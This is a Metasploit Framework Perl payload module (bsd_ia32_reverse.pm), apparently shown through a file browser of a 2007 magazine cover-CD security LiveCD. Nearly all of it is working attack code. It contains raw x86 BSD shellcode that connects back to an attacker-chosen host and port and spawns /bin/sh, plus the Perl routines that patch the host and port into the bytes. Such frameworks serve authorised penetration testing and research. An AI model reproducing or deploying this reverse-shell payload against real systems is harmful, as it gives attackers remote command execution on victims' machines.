home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / payloads / bsd_ia32_reverse.pm < prev    next >
Text File  |  2006-06-30  |  2KB  |  76 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Payload::bsd_ia32_reverse;
  11. use strict;
  12. use base 'Msf::PayloadComponent::ReverseConnection';
  13.  
  14. my $info =
  15. {
  16.   'Name'         => 'BSD IA32 Reverse Shell',
  17.   'Version'      => '$Revision: 1.2 $',
  18.   'Description'  => 'Connect back to attacker and spawn a shell',
  19.   'Authors'      => [ 'skape <mmiller [at] hick.org>', ],
  20.   'Arch'         => [ 'x86' ],
  21.   'Priv'         => 0,
  22.   'OS'           => [ 'bsd' ],
  23.   'Size'         => '',
  24. };
  25.  
  26. sub new 
  27. {
  28.     my $class = shift;
  29.     my $hash = @_ ? shift : { };
  30.     $hash = $class->MergeHashRec($hash, {'Info' => $info});
  31.     my $self = $class->SUPER::new($hash, @_);
  32.  
  33.     $self->_Info->{'Size'} = $self->_GenSize;
  34.     return($self);
  35. }
  36.  
  37. sub Build 
  38. {
  39.     my $self = shift;
  40.  
  41.     return($self->Generate($self->GetVar('LHOST'), $self->GetVar('LPORT')));
  42. }
  43.  
  44. sub Generate 
  45. {
  46.     my $self = shift;
  47.     my $host = shift;
  48.     my $port = shift;
  49.     my $off_host = 0xa;
  50.     my $off_port = 0x13;
  51.       
  52.     my $shellcode =
  53.         "\x6a\x61\x58\x99\x52\x42\x52\x42\x52\x68\x7f\x00\x00\x01\xcd\x80" .
  54.         "\x68\x10\x02\xbf\xbf\x89\xe1\x6a\x10\x51\x50\x51\x97\x6a\x62\x58" .
  55.         "\xcd\x80\x6a\x02\x59\xb0\x5a\x51\x57\x51\xcd\x80\x49\x79\xf6\x50" .
  56.         "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53" .
  57.         "\xb0\x3b\xcd\x80";
  58.  
  59.     my $host_bin = gethostbyname($host);
  60.     my $port_bin = pack('n', $port);
  61.  
  62.     substr($shellcode, $off_host, 4, $host_bin);
  63.     substr($shellcode, $off_port, 2, $port_bin);
  64.       
  65.     return($shellcode);
  66. }
  67.  
  68. sub _GenSize {
  69.     my $self = shift;
  70.     my $bin = $self->Generate('127.0.0.1', 4444);
  71.  
  72.     return(length($bin));
  73. }
  74.  
  75. 1;
  76.